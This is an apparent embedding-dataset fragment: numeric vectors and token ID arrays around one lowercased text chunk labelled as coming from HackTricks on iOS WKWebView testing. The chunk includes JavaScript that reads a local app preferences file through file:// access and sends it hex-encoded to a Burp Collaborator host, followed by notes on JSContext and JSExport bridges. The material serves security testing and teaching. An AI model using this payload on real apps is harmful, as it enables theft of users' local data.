-0.6540793776512146, 0.20203764736652374, 0.69504714012146, -0.5305429100990295, -0.3884986639022827, -0.6345228552818298, -0.1774626225233078, 0.2149895876646042, -0.6850388050079346, 0.713860809803009, -0.5761951208114624, 0.29097121953964233, 0.2880488336086273, 0.08128353208303452, 0.6062214970588684, -0.2846422791481018, 0.3701711893081665, 0.8810566663742065, 0.37688547372817993, -0.5101330280303955, -0.6774044632911682, 0.2691038250923157, 0.45943543314933777, 0.22016648948192596, -0.7199377417564392, -0.21016396582126617, 0.35732850432395935, -0.10136530548334122, -0.3268126845359802, -0.6920269131660461, -1.253635048866272, -0.8571065664291382, -0.3791208267211914, -0.004960076883435249, 0.15981781482696533, 0.01397800724953413, -0.1927599012851715, -0.32219186425209045, -0.1962215006351471, 0.018939532339572906, 0.1166233941912651, -0.6353188753128052, 0.3926188349723816, -0.18224599957466125, 0.18771511316299438, -0.39701077342033386, -0.2871944010257721, -0.17503714561462402, -0.47449854016304016, 0.1013694480061531, -0.041298482567071915, -0.8448962569236755, 0.08575597405433655, -0.5824035406112671, 0.3925953507423401, -0.5650386810302734, 0.28431957960128784, -0.08651268482208252, -0.5575318932533264, 0.22634859383106232, 0.39350590109825134, -0.0436803475022316, 0.399107962846756, 0.25466033816337585, 0.5794985294342041, -0.5491827726364136, -0.5768506526947021, 0.11507567018270493, 0.6255251169204712, 0.27694448828697205, 0.09075608104467392, 0.08433464914560318, -0.14132830500602722, 0.011457283981144428, 0.19940009713172913, -0.5576271414756775, -0.021671822294592857, -0.4718531370162964, 0.21964620053768158, -0.14654560387134552, 0.5114275217056274, 0.7214528322219849, 0.788483738899231, -0.35087862610816956, 0.4588010013103485, -0.6470956206321716, 0.27387240529060364, 0.403486430644989, -0.15290260314941406, -0.12170518934726715, -0.20110063254833221, 0.9518909454345703, -0.3631756007671356, -0.02821965143084526, -0.08324737101793289, -0.02870182879269123, 0.3538065254688263, 0.1891767531633377, 0.12606462836265564, -0.3367100954055786, -0.30899637937545776, 0.4729516804218292, 0.6711523532867432, 0.85560542345047, -0.42638248205184937, 0.4242607355117798, -0.08915328234434128, -0.7245355844497681, 0.22924275696277618, -1.1358773708343506, 0.3347180485725403, 0.283384770154953, -0.988560676574707, -0.08814975619316101, -0.3057123124599457, -0.5670879483222961, -0.3341673016548157, 0.2894870638847351, -0.47885704040527344, -0.34865033626556396, 0.03256000578403473, 0.36675068736076355, 0.11494208127260208, -0.02809583954513073, -0.4623411297798157, 0.12775157392024994, 0.3059041500091553, -0.9219670295715332, -0.7833805084228516, 0.04386729374527931, 0.6116804480552673, 0.6669741868972778, -0.383766770362854, -0.41560226678848267, -0.2645919919013977, -0.1335582584142685, -0.18436628580093384, -0.07223988324403763, 0.4721297025680542, -0.6950827836990356, 0.17833612859249115, -0.43331778049468994, -0.124846912920475, 0.31754839420318604, 0.053348228335380554, 0.13013753294944763, 0.3327188789844513, -0.23384153842926025, 0.5503586530685425, -0.16379119455814362, 0.04790676757693291, 0.3447600305080414, 0.25080201029777527, 0.029165687039494514, -0.5200161933898926, 0.2773410677909851, -0.28480812907218933, 0.06595911085605621, 0.5991258025169373, 0.25374385714530945, 0.029460910707712173, 0.3235294222831726, 0.569454550743103, -0.4593910276889801, -0.29198408126831055, 1.0009844303131104, 0.414373517036438, -0.03236554563045502, -0.43437251448631287, 0.02111765556037426, 0.272612988948822, -0.230287566781044, -0.7580025792121887, 0.113363116979599, -0.07973930239677429, -0.05440819263458252, -0.3535735607147217, 0.03546004742383957, 0.9114008545875549, -0.5473999977111816, 0.3740307092666626, -0.8183420300483704, -0.46132853627204895, 0.38333648443222046, 0.6703647375106812, -0.5330106616020203, 0.4605313539505005, 0.9484145045280457, 0.3176255524158478, -0.23673076927661896, 0.20330503582954407, -0.32087767124176025, 0.14876733720302582, 0.5627849698066711, 0.07596129179000854, -0.11186297982931137, 0.06185527518391609, -0.29990798234939575, -0.4984264373779297, -0.6289252042770386, 0.19686923921108246, 0.2543078362941742, -0.4498292803764343, 0.7385175824165344, -0.38391193747520447, -0.1602550446987152, -0.39765432476997375, 0.31218984723091125, -0.49861112236976624, -0.07494889199733734, 0.3241599500179291, -0.2915380001068115, -0.6305138468742371, 0.7455079555511475, 0.284593403339386, 0.8288182616233826, -0.4804001748561859, 1.0441962480545044, -0.5546254515647888, 0.5631968975067139, -0.252491295337677, -0.08526203036308289, -0.5266003608703613, 0.08026676625013351, -0.23458074033260345, -0.4033891558647156, -0.3980519771575928, -0.21476991474628448, 0.09652784466743469, -0.5180924534797668, -0.9776026010513306, -0.584265410900116, 0.3155539333820343, -0.6647971272468567, -1.1354873180389404, 0.15337015688419342, 0.32403871417045593, -0.3457862138748169, 0.04938038811087608, 0.19672197103500366, -0.15395060181617737, 0.27803894877433777, -0.4737676978111267, -0.26298418641090393, 0.021524565294384956, -0.06564143300056458, -0.05401826277375221, 0.47054341435432434, -0.3844717741012573, 0.08121403306722641, -0.07974018901586533, -0.9921725392341614, -0.6499147415161133, -0.300999253988266, -0.3232027590274811, -1.0206279754638672, 0.8564246892929077, 0.46293020248413086, 0.42257288098335266, 0.5376157760620117, -0.7005298137664795, -0.1855335235595703, 0.5413585305213928, 1.1072646379470825, -0.2098998874425888, 0.26060423254966736, 0.1452060043811798, -0.10529442131519318, 0.3374474346637726, 0.24831056594848633, 1.0224950313568115, -0.181367889046669, -0.4090498387813568, 0.03097642958164215, 0.5116709470748901, -0.5656989812850952, -0.027818333357572556, 0.21534888446331024, -0.14165814220905304, -0.09264861792325974, -0.5282983779907227, -1.4298524856567383, 0.1686273068189621, -0.7755085229873657, 0.7209768891334534, -0.12286626547574997, 0.05733466520905495, 0.46243637800216675, -0.08546162396669388, 0.28885605931282043, -1.0468004941940308, 4.488051414489746, 0.6153485178947449, 0.37796783447265625, 0.4489886164665222, 0.2642972767353058, 0.44750747084617615, 1.0448243618011475, -0.7944623231887817, -0.1354045420885086, 0.03472420945763588, 0.15699058771133423, 0.13512182235717773, 0.4816780686378479, 0.3107876777648926, 0.01367334183305502, 0.6350544095039368, -0.8633327484130859, 0.26275864243507385, 0.4106762409210205, -0.8021817803382874, -1.1869924068450928, 0.13464008271694183, -0.4276828467845917, 1.017231822013855, 0.2948508560657501, 0.396307110786438, -0.3679776191711426, -0.34942346811294556, -0.23923638463020325, -0.40886127948760986, -0.040820881724357605, -0.5439165830612183, 0.0839555412530899, 0.04556211829185486, -0.2025400698184967, 0.8752687573432922, 0.1764090210199356, -0.35204410552978516, -0.20856860280036926, 0.6026204824447632, 0.29006651043891907, -0.008153303526341915, 0.3057553470134735, -0.3999437093734741, 0.31534942984580994, 0.11231047660112381, -0.4311874806880951, 0.22480793297290802, 0.563081681728363, -0.7439925670623779, 0.9094043374061584, 0.07798483967781067, 0.696356475353241, 0.0663195475935936, -0.3880091607570648, 0.35430920124053955, 0.1922939270734787, -0.31670257449150085, 0.17141462862491608, -0.15090982615947723, 0.9584276676177979, -0.7008422017097473, 0.34402087330818176, -0.09933925420045853, -1.143586277961731, 0.2859993577003479, -0.0755079835653305, 0.7285794615745544, -0.40666645765304565, -0.32282862067222595, 0.04636409506201744, -0.12334782630205154, 0.001559757743962109, -0.4252331554889679, 0.7083068490028381, 0.2826383709907532, 0.44370049238204956, 0.1984710395336151, 0.8991395831108093, -0.5021184086799622, 0.3249429166316986, -0.4334516227245331, -0.3624415099620819, 0.4005288779735565, 0.8195388317108154, 0.7156908512115479, -0.4532031714916229, -0.5038691163063049, -0.03129465878009796, 0.563732922077179, 0.09767676144838333, -0.06775714457035065, 0.07509132474660873, -0.07621824741363525, 0.46339502930641174 ]
[ 8545, 2497, 8584, 8663, 8873, 27390, 3370, 1010, 6270, 2011, 12398, 1007, 1024, 2009, 12939, 9262, 22483, 2770, 1999, 1996, 6123, 1997, 1037, 5371, 1024, 1013, 1013, 5679, 24471, 2140, 2000, 3229, 4180, 2013, 2151, 4761, 1012, 2017, 2064, 3945, 2005, 2216, 4972, 1999, 1996, 3120, 3642, 1997, 1996, 4646, 2030, 1999, 1996, 9227, 12441, 1012, 2036, 1010, 2017, 2064, 2224, 1996, 2206, 10424, 8524, 5896, 2000, 2424, 2023, 2592, 1024, 27885, 3501, 2278, 1012, 5454, 1006, 27885, 3501, 2278, 1012, 4280, 1031, 1005, 1059, 2243, 8545, 2497, 8584, 1005, 1033, 1010, 1063, 2006, 18900, 2818, 1024, 3853, 1006, 1059, 2243, 1007, 1063, 10122, 1012, 8833, 1006, 1005, 2006, 18900, 2818, 1024, 1005, 1010, 1059, 2243, 1007, 1025, 10122, 1012, 8833, 1006, 1005, 24471, 2140, 1024, 1005, 1010, 1059, 2243, 1012, 24471, 2140, 1006, 1007, 1012, 2000, 3367, 4892, 1006, 1007, 1007, 1025, 10122, 1012, 8833, 1006, 1005, 9262, 22483, 8189, 23242, 1024, 1005, 1010, 1059, 2243, 1012, 9563, 1006, 1007, 1012, 18394, 1006, 1007, 1012, 9262, 22483, 8189, 23242, 1006, 1007, 1007, 1025, 10122, 1012, 8833, 1006, 1005, 3499, 8873, 19738, 9468, 7971, 19699, 5358, 8873, 2571, 3126, 4877, 1024, 1005, 1010, 1059, 2243, 1012, 9563, 1006, 1007, 1012, 18394, 1006, 1007, 1012, 3643, 29278, 14839, 1035, 1006, 1005, 3499, 8873, 19738, 9468, 7971, 19699, 5358, 8873, 2571, 3126, 4877, 1005, 1007, 1012, 2000, 3367, 4892, 1006, 1007, 1007, 1025, 10122, 1012, 8833, 1006, 1005, 2038, 2239, 2135, 3366, 23887, 8663, 6528, 2102, 1024, 1005, 1010, 1059, 2243, 1012, 2038, 2239, 2135, 3366, 23887, 8663, 6528, 2102, 1006, 1007, 1012, 2000, 3367, 4892, 1006, 1007, 1007, 1025, 10122, 1012, 8833, 1006, 1005, 3499, 19496, 14028, 7911, 9468, 7971, 19699, 5358, 8873, 2571, 3126, 4877, 1024, 1005, 1010, 1059, 2243, 1012, 9563, 1006, 1007, 1012, 3643, 29278, 14839, 1035, 1006, 1005, 3499, 19496, 14028, 7911, 9468, 7971, 19699, 5358, 8873, 2571, 3126, 4877, 1005, 1007, 1012, 2000, 3367, 4892, 1006, 1007, 1007, 1025, 1065, 1010, 2006, 9006, 10814, 2618, 1024, 3853, 1006, 1007, 1063, 10122, 1012, 8833, 1006, 1005, 2589, 2005, 1059, 2243, 8545, 2497, 8584, 999, 1005, 1007, 1025, 1065, 1065, 1007, 1025, 10424, 8524, 1011, 1057, 1011, 1042, 4012, 1012, 27280, 7011, 4014, 5397, 1012, 2073, 6491, 2100, 12618, 9333, 2121, 1011, 1048, 4773, 8584, 2015, 1035, 7742, 1012, 1046, 3385, 18900, 2818, 1024, 1026, 1059, 2243, 8545, 2497, 8584, 1024, 1014, 2595, 16068, 2692, 2620, 2497, 12521, 8889, 1025, 4853, 1027, 1006, 1014, 1014, 1025, 13710, 4464, 2509, 1007, 1025, 6741, 1027, 1026, 10250, 4710, 2121, 1024, 1014, 2595, 2487, 2278, 20958, 22025, 2546, 11387, 1028, 1028, 24471, 2140, 1024, 5371, 1024, 1013, 1013, 1013, 13075, 1013, 4684, 1013, 16143, 1013, 2951, 1013, 4646, 1013, 1037, 26187, 2549, 2094, 16048, 2683, 1011, 1015, 18939, 2581, 1011, 4413, 2683, 2278, 1011, 1023, 18939, 2683, 1011, 1037, 2620, 2581, 17134, 2620, 2683, 2050, 2620, 3676, 2050, 1013, 3075, 1013, 1059, 2243, 8545, 2497, 8584, 1013, 11967, 2487, 1012, 16129, 3900, 12044, 23235, 8189, 23242, 1024, 2995, 8095, 5004, 8873, 19738, 9468, 7971, 19699, 5358, 8873, 2571, 3126, 4877, 1024, 1014, 14949 ]
hack_tricks
435.txt
6
##onlysecurecontent : falseallowuniversalaccessfromfileurls : 0exfiltrate arbitrary files / / for some reason this payload doesn't work!! / / let me know if you know how to exfiltrate local files from a wkwebviewstring. prototype. hexencode = function ( ) { var hex, i ; var result = " " ; for ( i = 0 ; i < this. length ; i + + ) { hex = this. charcodeat ( i ). tostring ( 16 ) ; result + = ( " 000 " + hex ). slice ( - 4 ) ; } return result } var xhr = new xmlhttprequest ( ) ; xhr. onreadystatechange = function ( ) { if ( xhr. readystate = = xmlhttprequest. done ) { var xhr2 = new xmlhttprequest ( ) ; xhr2. open ('get ','http : / / 187e2gd0zxunzmb5vlowsz4j1a70vp. burpcollaborator. net /'+ xhr. responsetext. hexencode ( ), true ) ; xhr2. send ( null ) ; } } xhr. open ('get ','file : / / / var / mobile / containers / data / application / ed4e0ad8 - f7f7 - 4078 - 93cc - c350465048a5 / library / preferences / com. authenticationfailure. wheresmybrowser. plist ', true ) ; xhr. send ( null ) ; native methods exposed through webviewssince ios 7, apple introduced apis that allow communication between the javascript runtime in the webview and the native swift or objective - c objects. there are two fundamental ways of how native code and javascript can communicate : jscontext : when an objective - c or swift block is assigned to an identifier in a jscontext, javascriptcore automatically wraps the block in a javascript function. jsexport protocol : properties, instance methods and class methods declared in a jsexport - inherited protocol are mapped to javascript objects that are available to all javascript code. modifications of objects that are in the javascript environment
[ 0.08395788073539734, -0.4136240482330322, 0.23065388202667236, 0.5911144614219666, -0.44845151901245117, 0.37103158235549927, -0.5387352705001831, -0.09783630818128586, 0.17741473019123077, 1.0345579385757446, 0.08767877519130707, -0.5125471949577332, 0.22218042612075806, -0.17195110023021698, -0.7451168894767761, -0.2194768637418747, -0.44079622626304626, -0.09195958077907562, -0.7225680947303772, 0.1848422884941101, 0.2305918037891388, 0.13517305254936218, -0.9252997040748596, -1.1141983270645142, -0.5328949689865112, 0.3663170337677002, 1.0101221799850464, -0.12930268049240112, 0.8169933557510376, 1.1243876218795776, 0.12200962752103806, 0.12655183672904968, 0.052448876202106476, -0.49264654517173767, 0.13265489041805267, -0.33166903257369995, 1.2061104774475098, 0.05665874853730202, 0.1459091752767563, -0.30569249391555786, 0.19422219693660736, -0.20900706946849823, 0.0547952838242054, -0.7184550166130066, -0.10198909044265747, -0.489117294549942, 0.5227940678596497, -0.14121714234352112, -0.09068789333105087, 0.27007606625556946, 0.7332562208175659, 0.3648756444454193, 0.13119624555110931, 0.14189894497394562, -0.09083256870508194, 0.14479535818099976, -0.33652448654174805, -0.35451722145080566, -0.4564668536186218, 0.6236152052879333, -0.22901317477226257, 0.08002201467752457, 0.9630570411682129, -0.8134849667549133, 0.22982652485370636, 0.7465211749076843, 0.12324090301990509, 0.07618501037359238, -0.30993321537971497, -0.17103254795074463, 0.07165706157684326, 0.8998311161994934, -1.4190839529037476, -0.22793416678905487, -0.46663132309913635, -0.04216747358441353, -0.3462119400501251, 0.599358320236206, 0.25369277596473694, 0.8979737758636475, -0.15215818583965302, 0.6411474347114563, 0.5354964733123779, 0.07802677154541016, -0.3721577525138855, 0.09914721548557281, 0.06128760427236557, 0.7654991745948792, -0.395216703414917, 0.21331390738487244, 0.25183290243148804, 0.32466164231300354, -0.8185443878173828, -0.1757606565952301, 0.2411184310913086, 1.0425621271133423, -0.2925158441066742, 0.21887454390525818, -0.17224133014678955, -0.5691971182823181, 0.5490168333053589, 1.0213875770568848, -0.497730016708374, 0.4520547688007355, -0.4314822852611542, 0.2325132042169571, 0.3732626140117645, -0.03980956971645355, -0.6155836582183838, -0.47187539935112, 0.5642837882041931, -0.3384989798069, -0.010980677790939808, -0.9849173426628113, 0.07663428783416748, 0.17413833737373352, 0.23614227771759033, -0.08009038865566254, -0.08422654867172241, 0.83732670545578, -0.10556069761514664, -0.8014035224914551, 0.4852628707885742, 0.493985116481781, 0.3211134374141693, 0.2965129017829895, 0.4441918730735779, 0.526839554309845, -0.26995155215263367, -0.3254448175430298, 0.115312360227108, -0.14647060632705688, -0.17578990757465363, 0.4749590754508972, -0.8296209573745728, 0.18686990439891815, 0.2901577949523926, 0.24385465681552887, 0.732021152973175, -0.7767722010612488, -0.12035735696554184, 0.7252529859542847, -0.46492719650268555, 1.2504918575286865, 0.0806082934141159, -0.29521265625953674, -0.41392314434051514, 0.0946805477142334, -0.3316393196582794, -0.36656874418258667, -0.5312161445617676, -0.24875518679618835, 0.19396644830703735, -0.5334091782569885, -0.8211085200309753, 0.35215631127357483, -0.3461146950721741, 0.3324493169784546, -0.09491100162267685, -0.15997441112995148, 0.030856449156999588, 0.9412878155708313, 0.05669273063540459, 0.053658902645111084, -0.9877316355705261, 0.17275835573673248, -0.9353324770927429, -0.9192363023757935, -0.3560488522052765, 0.14984117448329926, 0.5643390417098999, 0.3347403109073639, 0.06812646985054016, 0.055922843515872955, 1.5681747198104858, 0.6033718585968018, 0.07108313590288162, 0.25145190954208374, 0.2347765415906906, 0.34060797095298767, -0.15549582242965698, 0.3237532675266266, 0.2434232383966446, 0.9673926830291748, -0.4156227707862854, -0.3547331392765045, -0.4100436568260193, -0.5101161599159241, 0.0174546018242836, -0.30701878666877747, 0.10359136760234833, 0.4516713619232178, -0.7288170456886292, 0.6214946508407593, 0.6003270149230957, 0.5637634992599487, -1.427865982055664, -0.06712915748357773, -0.17751151323318481, -1.8140559196472168, -0.3469419777393341, 0.2623040974140167, -0.20501506328582764, 0.46805340051651, -0.5498208403587341, -0.41051241755485535, 0.964939296245575, 0.8068245649337769, -0.3981061279773712, 0.7426960468292236, 0.3499247133731842, -0.08288905024528503, -0.2253173589706421, 0.13492144644260406, 0.34019145369529724, 0.09772132337093353, -0.6243231296539307, 0.280158132314682, 0.018873633816838264, 0.29399678111076355, -0.09293763339519501, 0.5542966723442078, 0.579362690448761, 0.42834708094596863, -0.4523210823535919, -0.3683401346206665, 0.38562074303627014, 0.33556511998176575, -0.31381964683532715, -0.06459277868270874, 0.20732930302619934, 0.36272820830345154, 0.12391509115695953, 0.7410917282104492, -0.2925783693790436, -0.48320162296295166, 0.4209047555923462, 0.1829177737236023, 0.25401997566223145, 0.16027185320854187, -0.49145588278770447, 0.7954081892967224, 0.538800060749054, 0.18206079304218292, 0.702896237373352, 0.4591650664806366, -0.38056451082229614, -0.33176907896995544, -0.1302347630262375, 0.6747153997421265, -0.24213632941246033, 1.0047944784164429, 0.7783932685852051, -0.44067829847335815, -0.6347061395645142, -0.36731624603271484, 0.8898967504501343, 0.5873573422431946, -0.7597740292549133, -0.9896712303161621, -0.18734179437160492, 0.25528860092163086, -1.0252541303634644, -0.4716779291629791, 0.13692007958889008, 0.34224119782447815, 0.19721482694149017, 0.36643698811531067, -0.23029647767543793, -0.9719793200492859, -0.9845792055130005, -0.2803809344768524, -0.8652144074440002, -0.46885228157043457, -0.9692690372467041, -0.08906389772891998, 0.25029993057250977, -0.5928090810775757, 0.844438910484314, 0.2602597773075104, -0.5469542741775513, 0.26119136810302734, 0.27886325120925903, 0.3868270814418793, 0.11742772161960602, 0.22818490862846375, -0.8889310359954834, 0.21829748153686523, 0.340553879737854, 0.7405694127082825, -0.5391430854797363, -0.3356306850910187, -0.8998911380767822, -0.016653016209602356, 0.01915733329951763, 0.17262700200080872, 0.9759485125541687, 0.22497981786727905, -0.15975861251354218, -0.2975364327430725, 0.17032445967197418, -0.4063740074634552, 0.18153834342956543, -0.291235089302063, -0.5328526496887207, 0.2855149507522583, 0.03991048038005829, -0.4486101567745209, 0.6590794324874878, 0.48996391892433167, -0.3160204589366913, 0.20927846431732178, -0.41390952467918396, 0.8206656575202942, -0.6095078587532043, 0.8059828877449036, 0.29888054728507996, 0.14151251316070557, 0.18936483561992645, -0.2915055751800537, 0.012477857060730457, -0.7457062602043152, -0.7089921236038208, -0.4890729784965515, -0.4161444306373596, 0.20337535440921783, 0.019211195409297943, -0.7784602046012878, 0.4430086314678192, -0.4670191705226898, -0.11597971618175507, -0.2821052372455597, -0.2608601152896881, 0.8947046399116516, 0.15444372594356537, -0.27316007018089294, -0.10878167301416397, -0.7789767980575562, -0.012012127786874771, 0.18265025317668915, 0.38436591625213623, -0.8238929510116577, 0.3236479163169861, 0.3949085474014282, 0.1260935217142105, 0.6718466877937317, 0.37157490849494934, -0.29025495052337646, -0.17628861963748932, -0.4492960572242737, -0.06208355724811554, -0.31069639325141907, 0.16420681774616241, 0.49344009160995483, -0.36235490441322327, 0.8153988718986511, -0.3406507968902588, -0.18637028336524963, 0.08140679448843002, 0.018851296976208687, 0.8527728915214539, 0.1537376493215561, 0.014054193161427975, -0.024342060089111328, -0.5186192989349365, -0.61822110414505, -0.24039030075073242, -0.13146542012691498, 0.35082992911338806, 0.26239752769470215, 0.3318086564540863, -0.4580408036708832, -0.3430919349193573, 0.7244644165039062, -0.12298310548067093, -0.4492412805557251, 0.797098696231842, -0.09386502951383591, 0.8589957356452942, -0.5079547762870789, 0.15556134283542633, 0.34079423546791077, 0.01978091336786747, 0.699876070022583, -0.03005927801132202, -0.28459036350250244, -0.4775269031524658, -0.4869626462459564, 0.01540239155292511, -0.17079594731330872, 0.4041690230369568, 0.16334651410579681, 0.46417054533958435, -0.2580634355545044, -0.26062145829200745, -0.9493818879127502, 0.521648108959198, 0.21802878379821777, 0.6648159623146057, 0.49611756205558777, 0.6595984697341919, -0.06108910217881203, -0.12566795945167542, 0.40828174352645874, -0.4391840994358063, 0.2424129843711853, -0.17537422478199005, 1.1265063285827637, 0.1059049665927887, 0.0038022215012460947, -0.1666610687971115, -0.2817476689815521, -0.42745110392570496, -0.13694162666797638, 0.4481198191642761, 0.2666691839694977, -0.24952733516693115, -0.1553199589252472, 1.2080676555633545, 0.26222309470176697, -0.30386650562286377, -0.02670310065150261, -0.08239500969648361, 0.6155882477760315, 0.6645521521568298, -0.6472576856613159, -0.3187120258808136, -0.7974965572357178, 0.15780939161777496, 0.2446310669183731, 0.4407581090927124, -0.4479266405105591, -0.7024989724159241, -0.13328872621059418, -0.614173173904419, 0.11858119070529938, 0.7209616899490356, 0.023626569658517838, 0.2868759334087372, -0.7833858728408813, -0.20686358213424683, 0.14432361721992493, -0.18665125966072083, -0.47372525930404663, -0.11144870519638062, 0.16090354323387146, 0.48072731494903564, 0.698965311050415, -0.18614539504051208, -0.19009965658187866, 0.027288371697068214, -0.8859747052192688, 0.7064675092697144, -1.289556622505188, -0.16411708295345306, 0.08443064987659454, 0.20355477929115295, -0.15245847404003143, 0.26102834939956665, -0.6699470281600952, -0.38109469413757324, -0.44283774495124817, 0.09654335677623749, -0.38367027044296265, -0.14808519184589386, 0.8856531381607056, -0.3820047080516815, -0.4041462540626526, 0.5187560319900513, 0.4936142861843109, 0.013196935877203941, 0.11697760224342346, -0.7176044583320618, -0.2742496728897095, 0.5864070057868958, -0.8308782577514648, 0.49686989188194275, 0.2284850925207138, -0.013860981911420822, -0.036733537912368774, -0.5245206356048584, 0.35844066739082336, -0.168365940451622, -0.11712466180324554, -0.4314383864402771, -0.5455227494239807, 0.42327848076820374, 0.25320252776145935, -0.03737728297710419, 0.35609564185142517, 0.012994104996323586, 0.049320533871650696, -0.35086384415626526, 0.30388250946998596, -0.3964616656303406, -0.5938368439674377, -0.3586845099925995, -0.3746156096458435, 0.4016285836696625, -0.013689113780856133, 0.9676499366760254, -0.4527750015258789, -0.5478010177612305, 0.6639679670333862, -0.15382596850395203, 0.40748560428619385, -0.8560072183609009, -0.18430079519748688, -0.6126408576965332, 0.2775569558143616, 0.06297186017036438, 0.8858826160430908, -0.05213451012969017, -0.019266046583652496, 0.11733268946409225, 0.44203290343284607, -0.03293704614043236, -0.2569153606891632, -0.1304807960987091, 0.6177546977996826, -0.019635524600744247, -0.5830208659172058, 0.32611459493637085, 0.2760818302631378, -0.7558522820472717, 0.03298885002732277, 0.4181453287601471, -0.6351227164268494, -1.1234954595565796, -0.5072638988494873, 0.17376214265823364, -0.39735621213912964, 0.11305481195449829, -0.4930799901485443, 0.24603526294231415, -0.43328726291656494, 0.6677278876304626, -0.21916303038597107, -0.7419230341911316, -0.262433260679245, 0.324506551027298, -0.07806725800037384, -0.22740209102630615, -0.02243833616375923, -0.1146232932806015, -0.32765519618988037, 0.004977759439498186, 0.6494436860084534, 0.3256058096885681, -0.4202243983745575, -0.2716602087020874, -0.16122135519981384, 0.6127697229385376, 0.46458959579467773, -0.6016735434532166, -0.276999831199646, -0.3175353407859802, -0.306368887424469, -0.4432138502597809, 0.18248899281024933, -0.7250109910964966, 0.38210776448249817, 0.09779445081949234, -0.09139031916856766, 0.297416090965271, -0.042318619787693024, 0.4171268939971924, -0.22044122219085693, 0.5774751305580139, -0.7340286374092102, 0.34165143966674805, -0.2749239504337311, 0.5498859882354736, 0.3630502223968506, -0.2895545959472656, -0.6241599321365356, 0.0662892758846283, -0.6911454200744629, -1.064725637435913, 0.5718189477920532, 0.03681459650397301, -0.178122878074646, -0.05718377232551575, -0.3020922541618347, 0.9666250944137573, -0.6218641996383667, 0.37324661016464233, 0.9181088209152222, 0.3502744436264038, 0.3265036940574646, -0.6008095741271973, 0.590547502040863, 0.16516463458538055, -0.5206652283668518, 0.41641882061958313, -0.26024553179740906, 0.3190416693687439, 0.1874781847000122, -0.037423815578222275, 0.26755061745643616, -0.8848342895507812, -0.3294800817966461, 0.23309805989265442, -0.244283989071846, 0.4194636344909668, -0.3606918156147003, -1.1455953121185303, -0.4051303565502167, 0.30303025245666504, 0.2120821177959442, -0.2292630672454834, 0.4051307141780853, 0.34350547194480896, 0.22941654920578003, 0.10186102241277695, 0.18372517824172974, -0.36419546604156494, -0.49225911498069763, 0.5434925556182861, -0.15385138988494873, -0.625895619392395, 0.4497760534286499, 0.22120553255081177, -0.9827690720558167, -0.10211402922868729, -0.46528390049934387, -0.04434959962964058, 0.14120520651340485, -0.3226255774497986, -0.6614028215408325, 0.02143576554954052, 0.32149264216423035, -0.4600851535797119, 0.39326176047325134, 0.4604717493057251, 0.20118795335292816, -0.5368655920028687, 0.7534612417221069, 0.2436802238225937, 0.3268049955368042, 0.8464017510414124, -0.7948646545410156, -0.6991574764251709, -0.8008444905281067, 0.4759732186794281, 0.5465038418769836, 0.13488948345184326, 1.0781737565994263, -0.28706061840057373, 0.5013273358345032, 0.15341372787952423, -0.18755847215652466, 0.9712272882461548, -0.11055389046669006, -0.059231825172901154, 0.9134438037872314, 0.17672303318977356, -0.8841503262519836, -0.4492338299751282, 0.20823487639427185, 0.005492681637406349, 0.10489564388990402, -0.7672317624092102, -0.2673523426055908, 0.014985447749495506, -0.09511319547891617, 0.19901052117347717, -0.5196822881698608, -0.8470780849456787, -0.8319284915924072, -0.21710267663002014, 0.01174144446849823, -0.003344448748975992, -0.08486203849315643, -0.40552911162376404, -0.5394150018692017, -0.3795599937438965, -0.08557341247797012, 0.22220967710018158, -0.43715304136276245, 0.26595446467399597, -0.502912700176239, 0.3098359704017639, -0.7730278968811035, -0.6333373785018921, -0.4463552236557007, -0.5592189431190491, -0.23816055059432983, -0.5967457890510559, -0.20787204802036285, -0.13572201132774353, -0.7357579469680786, 0.252603679895401, -0.46854305267333984, -0.005630388855934143, -0.0043119522742927074, -0.7728198170661926, 0.18014895915985107, 0.5574032664299011, -0.06205848976969719, 0.12676046788692474, 0.29935455322265625, 0.020098155364394188, -0.17666113376617432, -0.3712470233440399, -0.29360562562942505, 0.2883714437484741, 0.13990342617034912, -0.09023343026638031, 0.22579136490821838, -0.37758490443229675, 0.06592153012752533, -0.06590818613767624, -0.7517173290252686, -0.6675722599029541, -0.028257476165890694, 0.4311862885951996, 0.34252095222473145, -0.06772084534168243, 0.7644755244255066, 0.9967600703239441, 0.16795924305915833, 0.6448752880096436, -0.8240422606468201, 0.6511485576629639, 0.5178685784339905, -0.2968575656414032, 0.36587557196617126, 0.41811442375183105, 0.4558444917201996, -0.1792711764574051, -0.278743177652359, 0.25698184967041016, -0.16734881699085236, 0.4836142361164093, -0.1824355572462082, 0.06581666320562363, 0.09987754374742508, -0.2906567454338074, -0.08318237960338593, 0.17153702676296234, 0.41132310032844543, -0.4057554602622986, 0.11748179793357849, 0.01687980256974697, -0.6153382062911987, 0.3054237365722656, -1.0729271173477173, 0.04006350040435791, 0.23139670491218567, -0.41185638308525085, 0.13261136412620544, -1.0104671716690063, -0.3752273917198181, -0.10904161632061005, 0.13603229820728302, -0.19788284599781036, -0.027334297075867653, -0.08837312459945679, 0.30835849046707153, 1.1847938299179077, -0.34896478056907654, -0.26229071617126465, -0.5009578466415405, 0.35937976837158203, -1.0218619108200073, -0.8553087115287781, -0.007716186344623566, 1.021633267402649, 0.19552315771579742, -0.5983837246894836, -0.5634848475456238, 0.17048020660877228, 0.2827136516571045, 0.05314815416932106, -0.17474573850631714, -0.6509291529655457, -0.6183393597602844, 0.5665783882141113, -0.7909590005874634, 0.2133396863937378, 0.284082293510437, 0.2447301298379898, 0.39057233929634094, -0.1429840326309204, -0.11712551862001419, 0.2754184305667877, 0.333551824092865, 0.4296436309814453, 0.5114637017250061, 0.1601492166519165, 0.3070370852947235, -0.12167533487081528, 0.13990908861160278, 0.0003965170471929014, 0.25694239139556885, 0.3904353380203247, 0.4917091131210327, 0.3110891580581665, 0.17918294668197632, 0.8276864886283875, -0.5918500423431396, -0.26424410939216614, 0.24417881667613983, -0.49671071767807007, -0.15151678025722504, 0.06989743560552597, -0.4785407781600952, -0.11587631702423096, 0.5178287029266357, -0.4725847542285919, 0.22209884226322174, -0.0510777086019516, 0.022065911442041397, 0.2276904582977295, -0.007350299507379532, 0.9350306391716003, -0.6407179832458496, 0.7607390284538269, -0.5150518417358398, 0.10967246443033218, 0.8390575647354126, 0.0728449895977974, -0.746732771396637, 0.5640057921409607, 0.972687304019928, 0.5318797826766968, -0.6559860706329346, 0.4529675841331482, -0.45363396406173706, 0.26650941371917725, 0.13317884504795074, 0.15000291168689728, -0.5371271371841431, 0.36080193519592285, -0.018480056896805763, -0.30958259105682373, -1.2962664365768433, -0.008425289765000343, 0.6031021475791931, 0.031056949868798256, 0.4104762673377991, 0.21982251107692719, 0.1698443740606308, -0.06529375165700912, 0.13207955658435822, 